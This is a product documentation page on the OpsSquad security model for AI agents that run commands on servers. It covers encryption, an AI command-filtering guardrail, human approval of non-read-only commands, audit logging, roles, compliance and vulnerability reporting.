OpsSquad
Core Concepts

Security

Understanding the OpsSquad security model

Security is a foundational principle in OpsSquad. Since agents execute commands on your production infrastructure, we've built multiple layers of protection to keep your systems safe.

Security Philosophy

OpsSquad is built from the ground up to meet the most stringent security and compliance requirements of modern enterprises. We don't just monitor your infrastructure; we protect it generally through four key pillars:

Core Security Features

1. TLS Encrypted Sockets

Lock & Secure Transport

All communications use TLS encrypted sockets to prevent data leaking. Your data remains secure in transit and at rest, ensuring complete confidentiality. whether it's agent command traffic or platform data.

2. Proprietary SLM AI Guardrails

Intelligent Intent Filtering

A proprietary SLM (Small Language Model) AI model classifies and blocks dangerous terminal commands instantly. Unlike simple static whitelists, the system proactively filters intent to prevent unauthorized actions, understanding context better than regex-based rules.

3. Permission-Based Execution

Verified User Control

The system requires explicit user permission for agents to execute non-read-only commands. This human-in-the-loop approach prevents misaligned automated operations. You are always in control of what the agent does on your server.

4. Continuous Security Layering

Defense in Depth

Continuous addition of security layers ensures a safe experience and prevents agent hallucinations, keeping your operational environment stable and predictable. This includes resource limits, timeout constraints, and proactive monitoring of agent behavior.

Audit Logging

Every action is logged:

Logged Events

EventDetails Captured
Command ExecutionCommand, args, timestamp, user
Approval DecisionApproved/denied, who, when
Connection EventsConnect, disconnect, errors
Configuration ChangesWhat changed, who, when

Audit Log Format

{
  "timestamp": "2024-01-15T10:30:00Z",
  "event_type": "COMMAND_EXECUTED",
  "agent_id": "agent_abc123",
  "cluster_id": "cluster_xyz789",
  "user_id": "user_def456",
  "command": "ps aux",
  "result": "success",
  "execution_time_ms": 150
}

Log Retention

  • Logs retained for 90 days (default)
  • Export available for compliance
  • Extended retention on enterprise plans

Authentication & Authorization

Agent Authentication

Agents authenticate using:

  • Agent ID - Identifies the agent
  • API Key - Secret authentication token
  • Request IDs - Prevent replay attacks
  • Timestamps - Prevent stale requests

User Authentication

Users authenticate via:

  • Email/password
  • OAuth (Google, GitHub)
  • SSO (enterprise)

Authorization Model

RoleCapabilities
OwnerFull access, billing
AdminManage clusters, agents, users
MemberUse chat, view dashboards
ViewerRead-only access

Network Security

Agent Connections

  • Outbound TCP only (agent initiates)
  • TLS Encrypted Sockets for all traffic
  • Certificate validation
  • No inbound ports required

Platform Infrastructure

  • DDoS protection
  • WAF (Web Application Firewall)
  • Rate limiting
  • IP allowlisting (enterprise)

Permission & Approvals

The Permission-Based Execution system ensures humans control sensitive actions:

When Permission is Required

  • Non-read-only commands
  • Commands affecting services
  • File modifications
  • Any potentially risky operation classified by the SLM

Approval Workflow

  1. Agent proposes an action
  2. SLM AI Guardrails analyze intent; if safe, it proceeds to user review. Dangerous intents are blocked immediately.
  3. System pauses and notifies user for Permission.
  4. User reviews the exact command.
  5. User grants permission or denies.
  6. Command executes only after explicit verification.

See Approvals for details.

Compliance

OpsSquad supports compliance requirements:

StandardSupport
SOC 2Audit controls
GDPRData handling
HIPAAHealthcare data (enterprise)
PCI DSSPayment data (enterprise)

Security Best Practices

For Users

  1. Use strong, unique passwords
  2. Enable two-factor authentication
  3. Review approval requests carefully
  4. Grant permissions sparingly
  5. Review audit logs regularly

For Administrators

  1. Use least-privilege principle
  2. Rotate API keys periodically
  3. Monitor for unusual activity
  4. Keep agents updated
  5. Configure alerts for security events

For Organizations

  1. Implement SSO where possible
  2. Define clear access policies
  3. Regular security reviews
  4. Incident response planning
  5. Employee security training

Reporting Security Issues

If you discover a security vulnerability:

  1. Email: [email protected]
  2. Do not disclose publicly
  3. Provide detailed reproduction steps
  4. We'll respond within 24 hours

We have a responsible disclosure program and reward valid reports.

Next Steps

Squads

Understanding team-based organization with squads

Dashboard Overview

Web interface for managing squads, agents, nodes, and monitoring your OpsSquad.ai deployment

On this page

Security PhilosophyCore Security Features1. TLS Encrypted Sockets2. Proprietary SLM AI Guardrails3. Permission-Based Execution4. Continuous Security LayeringAudit LoggingLogged EventsAudit Log FormatLog RetentionAuthentication & AuthorizationAgent AuthenticationUser AuthenticationAuthorization ModelNetwork SecurityAgent ConnectionsPlatform InfrastructurePermission & ApprovalsWhen Permission is RequiredApproval WorkflowComplianceSecurity Best PracticesFor UsersFor AdministratorsFor OrganizationsReporting Security IssuesNext Steps